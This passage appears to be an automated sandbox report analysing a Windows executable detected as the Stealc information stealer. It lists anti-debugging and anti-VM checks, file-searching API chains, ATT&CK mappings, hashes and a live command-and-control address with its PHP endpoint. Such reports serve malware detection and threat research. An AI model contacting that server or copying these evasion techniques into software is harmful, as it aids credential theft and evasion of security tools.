                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAD55 second address: BFAD84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A813E4E78h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4A813E4E6Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAD84 second address: BFADD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80BFB61Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b call 00007F4A80BFB624h 0x00000010 sub dword ptr [ebp+1246149Dh], edx 0x00000016 pop edx 0x00000017 push 00000004h 0x00000019 push ebx 0x0000001a add dword ptr [ebp+122D1AF3h], ebx 0x00000020 pop edx 0x00000021 push 8C35DE4Bh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4A80BFB624h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFADD6 second address: BFADEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A813E4E71h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFADEB second address: BFADEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFC344 second address: BFC350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F4A813E4E66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFC350 second address: BFC354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDA84 second address: BFDAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F4A813E4E76h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4A813E4E6Bh 0x00000012 jc 00007F4A813E4E6Ch 0x00000018 js 00007F4A813E4E66h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDAB9 second address: BFDABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDABF second address: BFDAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDAC3 second address: BFDAD3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4A80BFB616h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDAD3 second address: BFDADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4A813E4E66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52403F2 second address: 524040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80BFB624h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B201B5 second address: B201BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B201BA second address: B201C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 971EF1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B1453B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BA14E3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00724910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00724910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0071DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0071E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00724570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00724570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0071ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0071BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0071DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0071F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00723EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00723EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00711160 GetSystemInfo,ExitProcess,0_2_00711160
                Source: file.exe, file.exe, 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1743203944.0000000001285000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743203944.0000000001258000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1743203944.000000000128B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                Source: file.exe, 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13546
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13549
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13567
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13560
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13600
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007145C0 VirtualProtect ?,00000004,00000100,000000000_2_007145C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00729860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00729860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00729750 mov eax, dword ptr fs:[00000030h]0_2_00729750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00727850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00727850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3808, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00729600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00729600
                Source: file.exe, file.exe, 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: YProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00727B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00726920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00726920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00727850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00727850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00727A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00727A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.710000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1702267630.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3808, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.710000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1702267630.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3808, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php)qfile.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpTfile.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.37/wsfile.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.php=qjfile.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.37sfile.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.37
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1521407
                                Start date and time:2024-09-28 08:55:12 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 2m 50s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 93
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousAmadeyBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.103
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.103

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.948240905185881
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'838'080 bytes
                                MD5:5afadfe8ee15c31905dbd4fd8d0cc47d
                                SHA1:ad98ad6e22aa75fe869344932022507386c159aa
                                SHA256:fb8269dae16f59cb0f20bed8792e9a497e019b6d21c489114616f2c46d1db396
                                SHA512:47a17c99b2ed49d1c87d8ff00394c289e9987bba3fb3c1b0333533266b341f5109117b7b59c73c705b8b33c5d1bc36cd2be5c878fd719be29ad2668ecd22f49c
                                SSDEEP:49152:ipOpJqTC24tcDM1as/k4pT9VhXe8f+1G/Bi:AlXLe7d9ru51
                                TLSH:EE8533E84D8391BFDB494DB92DBB389FE7F41536C88620528C72DCC5BD036A385252AD
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0xa95000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007F4A80ABB52Ah
                                pminsw mm3, qword ptr [ebx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [ebx], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+00h], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [eax+00000000h], eax
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add eax, 0000000Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+0Ah], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or al, 80h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                sub byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or dword ptr [eax+00000000h], eax
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pop ds
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+eax*4], cl
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x25b0000x2280020b60a66f8408c3621a6ce7e4a105f58unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
